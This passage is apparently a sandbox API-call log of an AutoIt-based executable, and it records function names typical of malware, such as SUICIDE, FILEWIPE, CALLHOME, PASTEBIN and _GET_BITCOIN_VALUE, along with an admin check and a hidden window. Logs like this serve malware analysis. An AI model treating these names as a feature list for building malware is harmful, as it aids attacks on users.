lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0154.570] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0154.570] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0154.570] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0154.570] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0154.570] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0154.570] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0154.570] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0154.570] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0154.570] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0154.570] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0154.570] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0154.570] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0154.570] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0154.570] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0154.570] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0154.570] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0154.571] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0154.571] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0154.571] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0154.571] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0154.571] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0154.571] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0154.571] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0154.571] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0154.571] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0154.571] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0154.571] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0154.571] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0154.571] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0154.571] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0154.571] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0154.571] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0154.571] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0154.572] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0154.572] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0154.572] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0154.572] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0154.572] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0154.572] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0154.572] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0154.572] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0154.572] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0154.572] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0154.572] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x86fd98, lpFilePart=0x87fd9c | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x87fd9c*="testers.exe") returned 0x2f [0154.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5438 | out: hHeap=0x8a0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a56f8 [0154.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b3390 | out: hHeap=0x8a0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9860 [0154.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5450 | out: hHeap=0x8a0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923658 [0154.573] AllocateAndInitializeSid (in: pIdentifierAuthority=0x87fd98, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x87fda0 | out: pSid=0x87fda0*=0x8c5450*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0154.573] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x8c5450*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x87fda4 | out: IsMember=0x87fda4) returned 1 [0154.574] GetSysColorBrush (nIndex=15) returned 0x1100059 [0154.574] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0154.574] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x20145 [0154.576] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x400ad [0154.577] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0x1a013b [0154.578] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x2013f [0154.578] RegisterClassExW (param_1=0x87fd74) returned 0xc120 [0154.578] GetSysColorBrush (nIndex=15) returned 0x1100059 [0154.578] RegisterClassExW (param_1=0x87fd18) returned 0xc121 [0154.578] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0154.578] InitCommonControlsEx (picce=0x87fd48) returned 1 [0154.580] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0x8dcb58 [0154.582] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x40107 [0154.583] ImageList_ReplaceIcon (himl=0x8dcb58, i=-1, hicon=0x40107) returned 0 [0154.692] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x1014c [0154.693] NtdllDefWindowProc_W () returned 0x0 [0154.693] NtdllDefWindowProc_W () returned 0x1 [0154.697] NtdllDefWindowProc_W () returned 0x0 [0154.734] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0154.734] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0154.734] CreatePopupMenu () returned 0x2014d [0154.735] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x1014c, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0x10150 [0154.994] NtdllDefWindowProc_W () returned 0x0 [0154.994] ShowWindow (hWnd=0x1014c, nCmdShow=0) returned 0 [0154.994] ShowWindow (hWnd=0x1014c, nCmdShow=0) returned 0 [0154.994] Shell_NotifyIconW (dwMessage=0x0, lpData=0x87f9f0) returned 1 [0155.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8dd558 [0155.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.026] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87f620) returned 1 [0155.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dd558 | out: hHeap=0x8a0000) returned 1 [0155.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.027] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.027] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9bf8 [0155.027] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0155.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9bf8 | out: hHeap=0x8a0000) returned 1 [0155.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.027] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.027] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0155.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.028] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.028] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0155.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.028] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.028] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0155.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.028] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.028] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0155.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.028] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.029] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.029] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.029] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.029] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.029] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.029] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.029] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bed98 | out: hHeap=0x8a0000) returned 1 [0155.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.030] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9bf8 [0155.030] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0155.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9bf8 | out: hHeap=0x8a0000) returned 1 [0155.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c78 | out: hHeap=0x8a0000) returned 1 [0155.030] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9310 [0155.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b92c8 [0155.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c78 [0155.030] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0155.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9bf8 [0155.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9298 [0155.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c88 [0155.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9298 | out: hHeap=0x8a0000) returned 1 [0155.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9c20 [0155.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9298 [0155.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b91d8 [0155.031] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0155.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5c98 [0155.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b91d8 | out: hHeap=0x8a0000) returned 1 [0155.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5c98 | out: hHeap=0x8a0000) returned 1 [0155.032] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9c48 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b91d8 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5c98 [0155.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b91d8 | out: hHeap=0x8a0000) returned 1 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9c70 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b91d8 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b91c0 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5ca8 [0155.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b91c0 | out: hHeap=0x8a0000) returned 1 [0155.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ca8 | out: hHeap=0x8a0000) returned 1 [0155.032] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9c98 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b91c0 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5ca8 [0155.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b91c0 | out: hHeap=0x8a0000) returned 1 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9cc0 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b91c0 [0155.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9340 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5cb8 [0155.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9340 | out: hHeap=0x8a0000) returned 1 [0155.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5cb8 | out: hHeap=0x8a0000) returned 1 [0155.033] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9ce8 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9340 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5cb8 [0155.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9340 | out: hHeap=0x8a0000) returned 1 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9d10 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9340 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9358 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5cc8 [0155.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9358 | out: hHeap=0x8a0000) returned 1 [0155.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5cc8 | out: hHeap=0x8a0000) returned 1 [0155.033] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9d38 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9358 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5cc8 [0155.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9358 | out: hHeap=0x8a0000) returned 1 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bed98 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9358 [0155.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9370 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5cd8 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9370 | out: hHeap=0x8a0000) returned 1 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9370 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5ce8 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9370 | out: hHeap=0x8a0000) returned 1 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ce8 | out: hHeap=0x8a0000) returned 1 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9d60 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9370 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5ce8 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ce8 | out: hHeap=0x8a0000) returned 1 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9388 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5ce8 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ce8 | out: hHeap=0x8a0000) returned 1 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9370 | out: hHeap=0x8a0000) returned 1 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9388 | out: hHeap=0x8a0000) returned 1 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9d60 | out: hHeap=0x8a0000) returned 1 [0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5cd8 | out: hHeap=0x8a0000) returned 1 [0155.034] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9d60 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9388 [0155.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5cd8 